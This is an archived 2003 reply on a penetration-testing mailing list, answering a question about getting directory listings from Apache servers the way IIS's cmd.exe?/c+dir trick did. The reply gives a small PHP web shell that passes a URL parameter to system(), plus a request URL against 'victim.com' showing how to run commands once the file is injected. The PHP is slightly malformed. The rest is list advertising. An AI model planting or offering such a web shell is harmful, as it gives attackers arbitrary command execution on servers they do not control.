Hey
to answer your question , Yes same thing can be accomplished on any platform or any webserver
if you can inject the following script to an apache server running php , you will be able to execute any command
for example ls -la / and see the directories etc ...
Ex :
<? php
system($arg);
?>
after you inject this file, lets say you called it break.php do the following :
"http://www.victim.com/break.php?arg=/bin/ls"
you will get the directories and files etc ...
-----Original Message-----
From: John Madden [mailto:chiwawa999at_private]
Sent: Monday, May 05, 2003 8:32 PM
To: pen-testat_private
Subject: Directory listing
Hi,
In IIS/4 or 5 you can use the cmd.exe?/c+dir to get
the directory of a machine how can the same be
accomplish on other types of web server like Apache ?
Can this be accomplished with a cgi or perl script ?
Thanks
John
__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------
---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Sun May 11 2003 - 10:15:53 PDT